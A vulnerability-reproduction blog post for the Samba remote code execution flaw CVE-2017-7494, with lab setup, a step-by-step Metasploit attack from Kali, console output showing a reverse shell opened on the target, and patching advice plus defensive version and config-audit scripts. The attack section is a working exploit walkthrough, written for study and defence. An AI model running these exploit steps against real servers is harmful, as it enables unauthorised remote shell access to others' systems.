From:http://fuping.site/2017/05/25/Samba-Remote-Code-Execution-Vulnerability-Replication/
Overview
Samba is the software that implements the SMB protocol on Linux and UNIX systems. On 24 May 2017 Samba released version 4.6.4 (together with 4.5.10 and 4.4.14), fixing a serious remote code execution vulnerability, CVE-2017-7494. It affects every Samba release from 3.5.0 onward up to, but not including, 4.6.4, 4.5.10 and 4.4.14. A malicious client that can upload a shared library to a writeable share, and that knows or can guess the library's on-disk path on the server, can make smbd load and execute it.
Ubuntu 16.04.2 x64 is used here as the target machine.
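As an added example (this is not code from the original post), the Python check below maps a Samba version string, such as the output of smbd -V, onto the affected ranges given above. It judges by version number alone, which is an assumption worth stating: distributions backport the fix without bumping the upstream number (Ubuntu 16.04 stays at 4.3.11-Ubuntu), so a hit here means "check the package changelog", not "exploitable".

```python
# Added example, not code from the original post: screen a Samba version
# string against the CVE-2017-7494 advisory ranges (affected from 3.5.0,
# fixed in 4.4.14 / 4.5.10 / 4.6.4).
import re

FIRST_AFFECTED = (3, 5, 0)
# Branch -> first release on that branch carrying the fix.
FIXED_IN = {(4, 4): (4, 4, 14), (4, 5): (4, 5, 10), (4, 6): (4, 6, 4)}


def parse_version(text):
    """Pull the leading x.y.z triple out of strings such as
    'Version 4.3.11-Ubuntu' (smbd -V output) or a bare '4.6.4'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    return tuple(int(x) for x in m.groups()) if m else None


def is_affected(version_text):
    """True if the upstream version number lies in the affected range.

    Assumption (also stated in the lead-in): this judges by version number
    only. Distro packages such as Ubuntu's 4.3.11-Ubuntu backport the fix
    without changing the number, so True means "check further", not
    "exploitable".
    """
    v = parse_version(version_text)
    if v is None:
        raise ValueError("no x.y.z version in %r" % (version_text,))
    if v < FIRST_AFFECTED:
        return False
    branch = v[:2]
    if branch in FIXED_IN:
        return v < FIXED_IN[branch]
    # 3.5 .. 4.3 never got an upstream fix release; 4.7 and later shipped patched.
    return branch < (4, 4)


if __name__ == "__main__":
    import subprocess
    try:
        out = subprocess.check_output(["smbd", "-V"], text=True)
    except (OSError, subprocess.CalledProcessError):
        out = "Version 4.3.11-Ubuntu"  # constructed fallback when smbd is absent
    verdict = "affected by version number" if is_affected(out) else "not affected"
    print(out.strip(), "->", verdict)
```

Run it on the target after the install step below; the Ubuntu 16.04.2 package in this post reports 4.3.11-Ubuntu, which the advisory ranges classify as affected.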
Reproduction Process
Environment Setup
Samba is not installed on the target by default, so install it first (sudo apt-get install samba) and then configure it.
Once the install succeeds, check the version (smbd -V).
Edit the Samba configuration file
sudo gedit /etc/samba/smb.conf
Add the following at the very bottom
[fuping] # the share name shown to clients
path = /tmp
public = yes
writeable = yes
Then restart the smbd service (sudo service smbd restart).
At this point the environment is ready. Now attack it from Kali.
Attack Process
First download the exploit module.
root@kali:~# cd /usr/share/metasploit-framework/modules/exploits/linux/samba
root@kali:/usr/share/metasploit-framework/modules/exploits/linux/samba# wget https://raw.githubusercontent.com/hdm/metasploit-framework/0520d7cf76f8e5e654cb60f157772200c1b9e230/modules/exploits/linux/samba/is_known_pipename.rb -O is_known_pipename.rb
Then load and run the module in Metasploit; the attack goes as follows
msf > use exploit/linux/samba/is_known_pipename
msf exploit(is_known_pipename) > show options
Module options (exploit/linux/samba/is_known_pipename):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   RHOST                            yes       The target address
   RPORT           445              yes       The SMB service port (TCP)
   SMB_FOLDER                       no        The directory to use within the writeable SMB share
   SMB_SHARE_BASE                   no        The remote filesystem path correlating with the SMB share name
   SMB_SHARE_NAME                   no        The name of the SMB share containing a writeable directory

Exploit target:

   Id  Name
   --  ----
   2   Linux x86

msf exploit(is_known_pipename) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   Linux ARM (LE)
   2   Linux x86
   3   Linux x86_64
msf exploit(is_known_pipename) > set RHOST 192.168.232.137
RHOST => 192.168.232.137
msf exploit(is_known_pipename) > set target 3
target => 3
msf exploit(is_known_pipename) > exploit
[*] Started reverse TCP handler on 192.168.232.134:4444
[*] 192.168.232.137:445 - Using location \\192.168.232.137\fuping for the path
[*] 192.168.232.137:445 - Payload is stored in //192.168.232.137/fuping/ as gRoUnyzb.so
[*] 192.168.232.137:445 - Trying location /volume1/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume1/fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume1/FUPING/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume1/Fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume2/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume2/fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume2/FUPING/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume2/Fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume3/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume3/fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume3/FUPING/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume3/Fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /shared/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /shared/fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /shared/FUPING/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /shared/Fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/FUPING/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/Fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/usb/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/usb/fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/usb/FUPING/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/usb/Fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /media/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /media/fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /media/FUPING/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /media/Fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/media/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/media/fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/media/FUPING/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/media/Fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /var/samba/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /var/samba/fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /var/samba/FUPING/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /var/samba/Fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /tmp/gRoUnyzb.so...
[*] Command shell session 1 opened (192.168.232.134:4444 -> 192.168.232.137:41392) at 2017-05-24 12:35:20 -0400
id
uid=65534(nobody) gid=0(root) groups=0(root),65534(nogroup)
whoami
nobody
ifconfig
docker0 Link encap:Ethernet HWaddr 02:42:23:77:72:91
inet addr:172.17.0.1 Bcast:0.0.0.0 Mask:255.255.0.0
inet6 addr: fe80::42:23ff:fe77:7291/64 Scope:Link
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:2 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:180 (180.0 B)
ens33 Link encap:Ethernet HWaddr 00:0c:29:77:23:9e
inet addr:192.168.232.137 Bcast:192.168.232.255 Mask:255.255.255.0
inet6 addr: fe80::7651:9ad0:80e5:c9c8/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:349052 errors:0 dropped:0 overruns:0 frame:0
TX packets:112974 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:419009840 (419.0 MB) TX bytes:8902292 (8.9 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:23329 errors:0 dropped:0 overruns:0 frame:0
TX packets:23329 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:48010585 (48.0 MB) TX bytes:48010585 (48.0 MB)
You need to set the target address and choose a Target; my system is 64-bit, so I set target to 3. The long run of "Trying location" lines is the module guessing the share's filesystem path on the server: smbd loads the uploaded library when the client opens a named pipe whose name is that library's full server-side path, so the module walks through common share locations until the one containing its .so hits. If the path is already known, as here (/tmp), setting SMB_SHARE_BASE to it skips the guessing. The shell runs as nobody because the share allows guest access; smbd switches to the share's effective user before serving it, so with an authenticated share the session would run as that account instead.
Result screenshot (image not included in this copy)
Update
2017-05-26: verified against an SMB share that requires login
The module has been updated and merged into Metasploit, so a plain msfupdate is enough to get it.
1. Edit the Samba configuration file on Ubuntu.
sudo gedit /etc/samba/smb.conf
Under [global] add: security = user
(This is already the default in Samba 4; the change that matters is dropping public = yes from the share, so guest access is gone and a valid account is required.)
Change the [fuping] section at the bottom to
[fuping] # the share name shown to clients
path = /tmp
writeable = yes
2. Add an SMB user
sudo useradd smbuser
sudo smbpasswd -a smbuser
3. Start the attack
msf > use exploit/linux/samba/is_known_pipename
msf exploit(is_known_pipename) > set SMBUSER smbuser
SMBUSER => smbuser
msf exploit(is_known_pipename) > set SMBPASS smbuser
SMBPASS => smbuser
msf exploit(is_known_pipename) > set RHOST 192.168.232.137
RHOST => 192.168.232.137
msf exploit(is_known_pipename) > exploit
Solutions
1. Affected users should download the latest Samba release and update manually as soon as possible.
2. Users of binary distribution packages (RPM, DEB and so on) should apply the security update immediately via yum, apt-get update && apt-get upgrade, or the equivalent.
3. Mitigation without patching: add "nt pipe support = no" under the [global] section of smb.conf and restart the Samba service. This stops clients from opening named pipes at all, which is what the exploit relies on, but as the Samba advisory notes it can also disable some expected functionality for Windows clients, so treat it as a stopgap until the patch is applied.
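As an added example that is not from the original post, the following Python audit reads an smb.conf and reports the two conditions the reproduction above turns on: writeable shares (with or without guest access; the update section shows that a writeable share behind a password is still exploitable by anyone holding credentials) and whether "nt pipe support = no" is set under [global]. The two embedded configs are constructed from the share stanzas used in this post. The parser is a simplified one (sections plus key = value lines, '#' and ';' comments stripped, synonyms writeable/writable/write ok/read only and guest ok/public handled), so use testparm -s for the authoritative interpretation of a real file.

```python
# Added example, not code from the original post. Audits an smb.conf for the
# preconditions of CVE-2017-7494 exploitation (writeable shares) and for the
# advisory's no-patch mitigation ("nt pipe support = no" under [global]).
# Simplified parser: validate real files with `testparm -s`.

YES = {"yes", "true", "1"}
NO = {"no", "false", "0"}

# Constructed sample: the share stanza used in the post (guest + writeable).
VULNERABLE_CONF = """
[global]
   workgroup = WORKGROUP
   security = user

[fuping] # the share name shown to clients
   path = /tmp
   public = yes
   writeable = yes
"""

# Constructed sample: same share, guest access removed, mitigation applied.
MITIGATED_CONF = """
[global]
   security = user
   nt pipe support = no

[fuping]
   path = /tmp
   writeable = yes
"""


def parse_smb_conf(text):
    """Return {section: {normalized_key: value}} for an smb.conf body."""
    sections = {}
    current = None
    for raw in text.splitlines():
        # Strip '#' / ';' comments, including the post's "[share] #note" style.
        line = raw.split("#", 1)[0].split(";", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and "]" in line:
            current = line[1:line.index("]")].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            # Samba ignores case and whitespace inside parameter names.
            sections[current]["".join(key.lower().split())] = value.strip()
    return sections


def _is_yes(opts, names, default=False):
    """First synonym present wins; none present -> default."""
    for name in names:
        if name in opts:
            return opts[name].lower() in YES
    return default


def audit_smb_conf(text):
    """Report writeable shares and whether the nt pipe mitigation is set."""
    conf = parse_smb_conf(text)
    glob = conf.get("global", {})
    mitigated = glob.get("ntpipesupport", "yes").lower() in NO
    writable_shares = []
    for name, opts in conf.items():
        if name == "global":
            continue
        # writeable / writable / write ok are synonyms; "read only = no" is
        # the inverse spelling of the same setting.
        writable = _is_yes(opts, ("writeable", "writable", "writeok")) or (
            opts.get("readonly", "yes").lower() in NO)
        if writable:
            writable_shares.append({
                "share": name,
                "path": opts.get("path", "?"),
                "guest": _is_yes(opts, ("guestok", "public")),
            })
    return {"nt_pipe_support_disabled": mitigated,
            "writable_shares": writable_shares}


if __name__ == "__main__":
    for label, conf in (("vulnerable", VULNERABLE_CONF), ("mitigated", MITIGATED_CONF)):
        print(label, audit_smb_conf(conf))
```

On a live host run audit_smb_conf(open("/etc/samba/smb.conf").read()): a non-empty writable_shares list on an unpatched version is exactly what the module's SMB_SHARE_NAME and SMB_SHARE_BASE options go looking for, and nt_pipe_support_disabled being False means the stopgap above has not been applied.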
This article first appeared on the WeChat public account 关注安全技术 under the title "Samba远程代码执行漏洞(CVE-2017-7494)复现过程" (Samba Remote Code Execution Vulnerability (CVE-2017-7494) Reproduction).